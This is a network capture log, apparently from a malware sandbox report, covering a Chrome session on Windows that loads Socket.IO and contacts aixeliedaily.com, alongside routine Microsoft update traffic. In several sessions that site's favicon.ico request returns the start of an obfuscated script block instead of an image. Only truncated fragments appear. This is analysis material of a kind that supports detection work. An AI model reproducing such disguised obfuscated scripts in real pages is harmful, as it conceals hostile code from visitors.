                          2024-10-23 20:58:10 UTC7805INData Raw: 34 30 30 30 0d 0a 3c 73 63 72 69 70 74 3e 66 75 6e 63 74 69 6f 6e 20 5f 30 78 33 30 32 33 28 5f 30 78 35 36 32 30 30 36 2c 5f 30 78 31 33 33 34 64 36 29 7b 63 6f 6e 73 74 20 5f 30 78 31 39 32 32 66 32 3d 5f 30 78 31 39 32 32 28 29 3b 72 65 74 75 72 6e 20 5f 30 78 33 30 32 33 3d 66 75 6e 63 74 69 6f 6e 28 5f 30 78 33 30 32 33 31 61 2c 5f 30 78 34 65 34 38 38 30 29 7b 5f 30 78 33 30 32 33 31 61 3d 5f 30 78 33 30 32 33 31 61 2d 30 78 31 62 66 3b 6c 65 74 20 5f 30 78 32 62 32 30 37 65 3d 5f 30 78 31 39 32 32 66 32 5b 5f 30 78 33 30 32 33 31 61 5d 3b 72 65 74 75 72 6e 20 5f 30 78 32 62 32 30 37 65 3b 7d 2c 5f 30 78 33 30 32 33 28 5f 30 78 35 36 32 30 30 36 2c 5f 30 78 31 33 33 34 64 36 29 3b 7d 66 75 6e 63 74 69 6f 6e 20 5f 30 78 31 39 32 32 28 29 7b 63 6f 6e
                          Data Ascii: 4000<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){con


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          4192.168.2.164970618.245.31.334436812C:\Program Files\Google\Chrome\Application\chrome.exe
                          TimestampBytes transferredDirectionData
                          2024-10-23 20:58:10 UTC566OUTGET /4.7.5/socket.io.min.js HTTP/1.1
                          Host: cdn.socket.io
                          Connection: keep-alive
                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                          Origin: https://aixeliedaily.com
                          sec-ch-ua-mobile: ?0
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          sec-ch-ua-platform: "Windows"
                          Accept: */*
                          Sec-Fetch-Site: cross-site
                          Sec-Fetch-Mode: cors
                          Sec-Fetch-Dest: script
                          Referer: https://aixeliedaily.com/
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US,en;q=0.9
                          2024-10-23 20:58:11 UTC702INHTTP/1.1 200 OK
                          Content-Type: application/javascript; charset=utf-8
                          Content-Length: 49993
                          Connection: close
                          Accept-Ranges: bytes
                          Access-Control-Allow-Origin: *
                          Cache-Control: public, max-age=31536000, immutable
                          Content-Disposition: inline; filename="socket.io.min.js"
                          Date: Sat, 03 Aug 2024 07:26:50 GMT
                          ETag: "777eb8fd4f8320b6e5cc9a7159bdec6a"
                          Server: Vercel
                          Strict-Transport-Security: max-age=63072000
                          X-Vercel-Cache: HIT
                          X-Vercel-Id: fra1::4xmtd-1722670010047-e30d468233ba
                          X-Cache: Hit from cloudfront
                          Via: 1.1 5dbbe1c6db9a003131a63be8ded250a4.cloudfront.net (CloudFront)
                          X-Amz-Cf-Pop: FRA56-P8
                          X-Amz-Cf-Id: I4rnUGAQGyhlnRZTGB63tMp8kBwm9rIWCjyEw699X0AH7yEmoW5hog==
                          Age: 7424482
                          2024-10-23 20:58:11 UTC16384INData Raw: 2f 2a 21 0a 20 2a 20 53 6f 63 6b 65 74 2e 49 4f 20 76 34 2e 37 2e 35 0a 20 2a 20 28 63 29 20 32 30 31 34 2d 32 30 32 34 20 47 75 69 6c 6c 65 72 6d 6f 20 52 61 75 63 68 0a 20 2a 20 52 65 6c 65 61 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 4c 69 63 65 6e 73 65 2e 0a 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 74 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 74 29 3a 28 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67
                          Data Ascii: /*! * Socket.IO v4.7.5 * (c) 2014-2024 Guillermo Rauch * Released under the MIT License. */!function(e,t){"object"==typeof exports&&"undefined"!=typeof module?module.exports=t():"function"==typeof define&&define.amd?define(t):(e="undefined"!=typeof g
                          2024-10-23 20:58:11 UTC16384INData Raw: 66 20 64 6f 63 75 6d 65 6e 74 29 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 61 74 74 61 63 68 45 76 65 6e 74 29 61 74 74 61 63 68 45 76 65 6e 74 28 22 6f 6e 75 6e 6c 6f 61 64 22 2c 61 65 29 3b 65 6c 73 65 20 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 29 7b 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 6f 6e 70 61 67 65 68 69 64 65 22 69 6e 20 49 3f 22 70 61 67 65 68 69 64 65 22 3a 22 75 6e 6c 6f 61 64 22 2c 61 65 2c 21 31 29 7d 66 75 6e 63 74 69 6f 6e 20 61 65 28 29 7b 66 6f 72 28 76 61 72 20 65 20 69 6e 20 73 65 2e 72 65 71 75 65 73 74 73 29 73 65 2e 72 65 71 75 65 73 74 73 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 65 29 26 26 73 65 2e 72 65 71 75
                          Data Ascii: f document)if("function"==typeof attachEvent)attachEvent("onunload",ae);else if("function"==typeof addEventListener){addEventListener("onpagehide"in I?"pagehide":"unload",ae,!1)}function ae(){for(var e in se.requests)se.requests.hasOwnProperty(e)&&se.requ
                          2024-10-23 20:58:11 UTC16384INData Raw: 74 61 20 77 68 65 6e 20 72 65 63 6f 6e 73 74 72 75 63 74 69 6e 67 20 61 20 70 61 63 6b 65 74 22 29 3b 76 61 72 20 6e 3d 28 74 3d 74 68 69 73 2e 64 65 63 6f 64 65 53 74 72 69 6e 67 28 65 29 29 2e 74 79 70 65 3d 3d 3d 42 65 2e 42 49 4e 41 52 59 5f 45 56 45 4e 54 3b 6e 7c 7c 74 2e 74 79 70 65 3d 3d 3d 42 65 2e 42 49 4e 41 52 59 5f 41 43 4b 3f 28 74 2e 74 79 70 65 3d 6e 3f 42 65 2e 45 56 45 4e 54 3a 42 65 2e 41 43 4b 2c 74 68 69 73 2e 72 65 63 6f 6e 73 74 72 75 63 74 6f 72 3d 6e 65 77 20 50 65 28 74 29 2c 30 3d 3d 3d 74 2e 61 74 74 61 63 68 6d 65 6e 74 73 26 26 70 28 73 28 69 2e 70 72 6f 74 6f 74 79 70 65 29 2c 22 65 6d 69 74 52 65 73 65 72 76 65 64 22 2c 74 68 69 73 29 2e 63 61 6c 6c 28 74 68 69 73 2c 22 64 65 63 6f 64 65 64 22 2c 74 29 29 3a 70 28 73 28 69
                          Data Ascii: ta when reconstructing a packet");var n=(t=this.decodeString(e)).type===Be.BINARY_EVENT;n||t.type===Be.BINARY_ACK?(t.type=n?Be.EVENT:Be.ACK,this.reconstructor=new Pe(t),0===t.attachments&&p(s(i.prototype),"emitReserved",this).call(this,"decoded",t)):p(s(i
                          2024-10-23 20:58:11 UTC841INData Raw: 26 28 65 3d 6e 2e 70 72 6f 74 6f 63 6f 6c 2b 22 2f 2f 22 2b 6e 2e 68 6f 73 74 29 2c 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 65 26 26 28 22 2f 22 3d 3d 3d 65 2e 63 68 61 72 41 74 28 30 29 26 26 28 65 3d 22 2f 22 3d 3d 3d 65 2e 63 68 61 72 41 74 28 31 29 3f 6e 2e 70 72 6f 74 6f 63 6f 6c 2b 65 3a 6e 2e 68 6f 73 74 2b 65 29 2c 2f 5e 28 68 74 74 70 73 3f 7c 77 73 73 3f 29 3a 5c 2f 5c 2f 2f 2e 74 65 73 74 28 65 29 7c 7c 28 65 3d 76 6f 69 64 20 30 21 3d 3d 6e 3f 6e 2e 70 72 6f 74 6f 63 6f 6c 2b 22 2f 2f 22 2b 65 3a 22 68 74 74 70 73 3a 2f 2f 22 2b 65 29 2c 72 3d 76 65 28 65 29 29 2c 72 2e 70 6f 72 74 7c 7c 28 2f 5e 28 68 74 74 70 7c 77 73 29 24 2f 2e 74 65 73 74 28 72 2e 70 72 6f 74 6f 63 6f 6c 29 3f 72 2e 70 6f 72 74 3d 22 38 30 22 3a 2f 5e 28 68 74
                          Data Ascii: &(e=n.protocol+"//"+n.host),"string"==typeof e&&("/"===e.charAt(0)&&(e="/"===e.charAt(1)?n.protocol+e:n.host+e),/^(https?|wss?):\/\//.test(e)||(e=void 0!==n?n.protocol+"//"+e:"https://"+e),r=ve(e)),r.port||(/^(http|ws)$/.test(r.protocol)?r.port="80":/^(ht


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          5192.168.2.1649710192.254.233.444436812C:\Program Files\Google\Chrome\Application\chrome.exe
                          TimestampBytes transferredDirectionData
                          2024-10-23 20:58:12 UTC590OUTGET /favicon.ico HTTP/1.1
                          Host: aixeliedaily.com
                          Connection: keep-alive
                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                          sec-ch-ua-mobile: ?0
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          sec-ch-ua-platform: "Windows"
                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                          Sec-Fetch-Site: same-origin
                          Sec-Fetch-Mode: no-cors
                          Sec-Fetch-Dest: image
                          Referer: https://aixeliedaily.com/m/
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US,en;q=0.9
                          2024-10-23 20:58:12 UTC208INHTTP/1.1 200 OK
                          Date: Wed, 23 Oct 2024 20:58:12 GMT
                          Server: Apache
                          Upgrade: h2,h2c
                          Connection: Upgrade, close
                          Vary: Accept-Encoding
                          Transfer-Encoding: chunked
                          Content-Type: image/vnd.microsoft.icon
                          2024-10-23 20:58:12 UTC7235INData Raw: 31 63 33 36 0d 0a 3c 73 63 72 69 70 74 3e 66 75 6e 63 74 69 6f 6e 20 5f 30 78 33 30 32 33 28 5f 30 78 35 36 32 30 30 36 2c 5f 30 78 31 33 33 34 64 36 29 7b 63 6f 6e 73 74 20 5f 30 78 31 39 32 32 66 32 3d 5f 30 78 31 39 32 32 28 29 3b 72 65 74 75 72 6e 20 5f 30 78 33 30 32 33 3d 66 75 6e 63 74 69 6f 6e 28 5f 30 78 33 30 32 33 31 61 2c 5f 30 78 34 65 34 38 38 30 29 7b 5f 30 78 33 30 32 33 31 61 3d 5f 30 78 33 30 32 33 31 61 2d 30 78 31 62 66 3b 6c 65 74 20 5f 30 78 32 62 32 30 37 65 3d 5f 30 78 31 39 32 32 66 32 5b 5f 30 78 33 30 32 33 31 61 5d 3b 72 65 74 75 72 6e 20 5f 30 78 32 62 32 30 37 65 3b 7d 2c 5f 30 78 33 30 32 33 28 5f 30 78 35 36 32 30 30 36 2c 5f 30 78 31 33 33 34 64 36 29 3b 7d 66 75 6e 63 74 69 6f 6e 20 5f 30 78 31 39 32 32 28 29 7b 63 6f 6e
                          Data Ascii: 1c36<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){con


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          6192.168.2.164971118.245.31.54436812C:\Program Files\Google\Chrome\Application\chrome.exe
                          TimestampBytes transferredDirectionData
                          2024-10-23 20:58:12 UTC359OUTGET /4.7.5/socket.io.min.js HTTP/1.1
                          Host: cdn.socket.io
                          Connection: keep-alive
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          Accept: */*
                          Sec-Fetch-Site: none
                          Sec-Fetch-Mode: cors
                          Sec-Fetch-Dest: empty
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US,en;q=0.9
                          2024-10-23 20:58:12 UTC702INHTTP/1.1 200 OK
                          Content-Type: application/javascript; charset=utf-8
                          Content-Length: 49993
                          Connection: close
                          Accept-Ranges: bytes
                          Access-Control-Allow-Origin: *
                          Cache-Control: public, max-age=31536000, immutable
                          Content-Disposition: inline; filename="socket.io.min.js"
                          Date: Sat, 03 Aug 2024 07:26:50 GMT
                          ETag: "777eb8fd4f8320b6e5cc9a7159bdec6a"
                          Server: Vercel
                          Strict-Transport-Security: max-age=63072000
                          X-Vercel-Cache: HIT
                          X-Vercel-Id: fra1::4xmtd-1722670010047-e30d468233ba
                          X-Cache: Hit from cloudfront
                          Via: 1.1 1feab8d6a8e5cc920c359b62fd33d3de.cloudfront.net (CloudFront)
                          X-Amz-Cf-Pop: FRA56-P8
                          X-Amz-Cf-Id: BPDrSZNC1veDOO7MKmTVYs8Tw_P1adsEt3JCW47E-eChtqBMiNtuxg==
                          Age: 7424483
                          2024-10-23 20:58:12 UTC15682INData Raw: 2f 2a 21 0a 20 2a 20 53 6f 63 6b 65 74 2e 49 4f 20 76 34 2e 37 2e 35 0a 20 2a 20 28 63 29 20 32 30 31 34 2d 32 30 32 34 20 47 75 69 6c 6c 65 72 6d 6f 20 52 61 75 63 68 0a 20 2a 20 52 65 6c 65 61 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 4c 69 63 65 6e 73 65 2e 0a 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 74 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 74 29 3a 28 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67
                          Data Ascii: /*! * Socket.IO v4.7.5 * (c) 2014-2024 Guillermo Rauch * Released under the MIT License. */!function(e,t){"object"==typeof exports&&"undefined"!=typeof module?module.exports=t():"function"==typeof define&&define.amd?define(t):(e="undefined"!=typeof g
                          2024-10-23 20:58:12 UTC16384INData Raw: 64 20 74 68 69 73 2e 73 65 74 54 69 6d 65 6f 75 74 46 6e 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 74 2e 6f 6e 45 72 72 6f 72 28 65 29 7d 29 2c 30 29 7d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 64 6f 63 75 6d 65 6e 74 26 26 28 74 68 69 73 2e 69 6e 64 65 78 3d 69 2e 72 65 71 75 65 73 74 73 43 6f 75 6e 74 2b 2b 2c 69 2e 72 65 71 75 65 73 74 73 5b 74 68 69 73 2e 69 6e 64 65 78 5d 3d 74 68 69 73 29 7d 7d 2c 7b 6b 65 79 3a 22 6f 6e 45 72 72 6f 72 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 74 68 69 73 2e 65 6d 69 74 52 65 73 65 72 76 65 64 28 22 65 72 72 6f 72 22 2c 65 2c 74 68 69 73 2e 78 68 72 29 2c 74 68 69 73 2e 63 6c 65 61 6e 75 70 28 21 30 29 7d 7d 2c 7b 6b 65 79 3a 22 63 6c 65 61 6e 75 70 22 2c 76 61 6c 75 65 3a 66 75 6e
                          Data Ascii: d this.setTimeoutFn((function(){t.onError(e)}),0)}"undefined"!=typeof document&&(this.index=i.requestsCount++,i.requests[this.index]=this)}},{key:"onError",value:function(e){this.emitReserved("error",e,this.xhr),this.cleanup(!0)}},{key:"cleanup",value:fun
                          2024-10-23 20:58:12 UTC16384INData Raw: 65 2e 64 61 74 61 2c 69 64 3a 65 2e 69 64 7d 29 7d 7d 2c 7b 6b 65 79 3a 22 65 6e 63 6f 64 65 41 73 53 74 72 69 6e 67 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 22 22 2b 65 2e 74 79 70 65 3b 72 65 74 75 72 6e 20 65 2e 74 79 70 65 21 3d 3d 42 65 2e 42 49 4e 41 52 59 5f 45 56 45 4e 54 26 26 65 2e 74 79 70 65 21 3d 3d 42 65 2e 42 49 4e 41 52 59 5f 41 43 4b 7c 7c 28 74 2b 3d 65 2e 61 74 74 61 63 68 6d 65 6e 74 73 2b 22 2d 22 29 2c 65 2e 6e 73 70 26 26 22 2f 22 21 3d 3d 65 2e 6e 73 70 26 26 28 74 2b 3d 65 2e 6e 73 70 2b 22 2c 22 29 2c 6e 75 6c 6c 21 3d 65 2e 69 64 26 26 28 74 2b 3d 65 2e 69 64 29 2c 6e 75 6c 6c 21 3d 65 2e 64 61 74 61 26 26 28 74 2b 3d 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 65 2e 64 61 74 61 2c 74 68 69
                          Data Ascii: e.data,id:e.id})}},{key:"encodeAsString",value:function(e){var t=""+e.type;return e.type!==Be.BINARY_EVENT&&e.type!==Be.BINARY_ACK||(t+=e.attachments+"-"),e.nsp&&"/"!==e.nsp&&(t+=e.nsp+","),null!=e.id&&(t+=e.id),null!=e.data&&(t+=JSON.stringify(e.data,thi
                          2024-10-23 20:58:12 UTC1543INData Raw: 65 74 54 69 6d 65 6f 75 74 46 6e 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 74 2e 73 6b 69 70 52 65 63 6f 6e 6e 65 63 74 7c 7c 28 65 2e 65 6d 69 74 52 65 73 65 72 76 65 64 28 22 72 65 63 6f 6e 6e 65 63 74 5f 61 74 74 65 6d 70 74 22 2c 74 2e 62 61 63 6b 6f 66 66 2e 61 74 74 65 6d 70 74 73 29 2c 74 2e 73 6b 69 70 52 65 63 6f 6e 6e 65 63 74 7c 7c 74 2e 6f 70 65 6e 28 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 6e 3f 28 74 2e 5f 72 65 63 6f 6e 6e 65 63 74 69 6e 67 3d 21 31 2c 74 2e 72 65 63 6f 6e 6e 65 63 74 28 29 2c 65 2e 65 6d 69 74 52 65 73 65 72 76 65 64 28 22 72 65 63 6f 6e 6e 65 63 74 5f 65 72 72 6f 72 22 2c 6e 29 29 3a 74 2e 6f 6e 72 65 63 6f 6e 6e 65 63 74 28 29 7d 29 29 29 7d 29 2c 6e 29 3b 74 68 69 73 2e 6f 70 74 73 2e 61 75 74 6f 55 6e 72 65 66 26 26 72 2e
                          Data Ascii: etTimeoutFn((function(){t.skipReconnect||(e.emitReserved("reconnect_attempt",t.backoff.attempts),t.skipReconnect||t.open((function(n){n?(t._reconnecting=!1,t.reconnect(),e.emitReserved("reconnect_error",n)):t.onreconnect()})))}),n);this.opts.autoUnref&&r.


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          7192.168.2.1649714192.254.233.444436812C:\Program Files\Google\Chrome\Application\chrome.exe
                          TimestampBytes transferredDirectionData
                          2024-10-23 20:58:13 UTC351OUTGET /favicon.ico HTTP/1.1
                          Host: aixeliedaily.com
                          Connection: keep-alive
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          Accept: */*
                          Sec-Fetch-Site: none
                          Sec-Fetch-Mode: cors
                          Sec-Fetch-Dest: empty
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US,en;q=0.9
                          2024-10-23 20:58:13 UTC208INHTTP/1.1 200 OK
                          Date: Wed, 23 Oct 2024 20:58:13 GMT
                          Server: Apache
                          Upgrade: h2,h2c
                          Connection: Upgrade, close
                          Vary: Accept-Encoding
                          Transfer-Encoding: chunked
                          Content-Type: image/vnd.microsoft.icon
                          2024-10-23 20:58:13 UTC7235INData Raw: 31 63 33 36 0d 0a 3c 73 63 72 69 70 74 3e 66 75 6e 63 74 69 6f 6e 20 5f 30 78 33 30 32 33 28 5f 30 78 35 36 32 30 30 36 2c 5f 30 78 31 33 33 34 64 36 29 7b 63 6f 6e 73 74 20 5f 30 78 31 39 32 32 66 32 3d 5f 30 78 31 39 32 32 28 29 3b 72 65 74 75 72 6e 20 5f 30 78 33 30 32 33 3d 66 75 6e 63 74 69 6f 6e 28 5f 30 78 33 30 32 33 31 61 2c 5f 30 78 34 65 34 38 38 30 29 7b 5f 30 78 33 30 32 33 31 61 3d 5f 30 78 33 30 32 33 31 61 2d 30 78 31 62 66 3b 6c 65 74 20 5f 30 78 32 62 32 30 37 65 3d 5f 30 78 31 39 32 32 66 32 5b 5f 30 78 33 30 32 33 31 61 5d 3b 72 65 74 75 72 6e 20 5f 30 78 32 62 32 30 37 65 3b 7d 2c 5f 30 78 33 30 32 33 28 5f 30 78 35 36 32 30 30 36 2c 5f 30 78 31 33 33 34 64 36 29 3b 7d 66 75 6e 63 74 69 6f 6e 20 5f 30 78 31 39 32 32 28 29 7b 63 6f 6e
                          Data Ascii: 1c36<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){con


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          8192.168.2.1649715184.28.90.27443
                          TimestampBytes transferredDirectionData
                          2024-10-23 20:58:15 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                          Connection: Keep-Alive
                          Accept: */*
                          Accept-Encoding: identity
                          User-Agent: Microsoft BITS/7.8
                          Host: fs.microsoft.com
                          2024-10-23 20:58:16 UTC466INHTTP/1.1 200 OK
                          Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                          Content-Type: application/octet-stream
                          ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                          Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                          Server: ECAcc (lpl/EF06)
                          X-CID: 11
                          X-Ms-ApiVersion: Distribute 1.2
                          X-Ms-Region: prod-neu-z1
                          Cache-Control: public, max-age=71276
                          Date: Wed, 23 Oct 2024 20:58:16 GMT
                          Connection: close
                          X-CID: 2


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          9192.168.2.1649716184.28.90.27443
                          TimestampBytes transferredDirectionData
                          2024-10-23 20:58:17 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                          Connection: Keep-Alive
                          Accept: */*
                          Accept-Encoding: identity
                          If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                          Range: bytes=0-2147483646
                          User-Agent: Microsoft BITS/7.8
                          Host: fs.microsoft.com
                          2024-10-23 20:58:17 UTC514INHTTP/1.1 200 OK
                          ApiVersion: Distribute 1.1
                          Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                          Content-Type: application/octet-stream
                          ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                          Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                          Server: ECAcc (lpl/EF06)
                          X-CID: 11
                          X-Ms-ApiVersion: Distribute 1.2
                          X-Ms-Region: prod-weu-z1
                          Cache-Control: public, max-age=71244
                          Date: Wed, 23 Oct 2024 20:58:17 GMT
                          Content-Length: 55
                          Connection: close
                          X-CID: 2
                          2024-10-23 20:58:17 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                          Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          10192.168.2.164971720.12.23.50443
                          TimestampBytes transferredDirectionData
                          2024-10-23 20:58:18 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=5Ph5S4BCaUnUfHa&MD=vlcclxBN HTTP/1.1
                          Connection: Keep-Alive
                          Accept: */*
                          User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                          Host: slscr.update.microsoft.com
                          2024-10-23 20:58:18 UTC560INHTTP/1.1 200 OK
                          Cache-Control: no-cache
                          Pragma: no-cache
                          Content-Type: application/octet-stream
                          Expires: -1
                          Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                          ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                          MS-CorrelationId: 062e18ba-0c8f-42c8-9faf-1ad5d267f048
                          MS-RequestId: 91b99a8d-c6f9-4ee7-b90e-e2df7988c7e0
                          MS-CV: SCPQ3cvMCEuECOKM.0
                          X-Microsoft-SLSClientCache: 2880
                          Content-Disposition: attachment; filename=environment.cab
                          X-Content-Type-Options: nosniff
                          Date: Wed, 23 Oct 2024 20:58:17 GMT
                          Connection: close
                          Content-Length: 24490
                          2024-10-23 20:58:18 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                          Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                          2024-10-23 20:58:18 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                          Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          11192.168.2.164971820.12.23.50443
                          TimestampBytes transferredDirectionData
                          2024-10-23 20:58:56 UTC306OUTGET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=5Ph5S4BCaUnUfHa&MD=vlcclxBN HTTP/1.1
                          Connection: Keep-Alive
                          Accept: */*
                          User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                          Host: slscr.update.microsoft.com
                          2024-10-23 20:58:56 UTC560INHTTP/1.1 200 OK
                          Cache-Control: no-cache
                          Pragma: no-cache
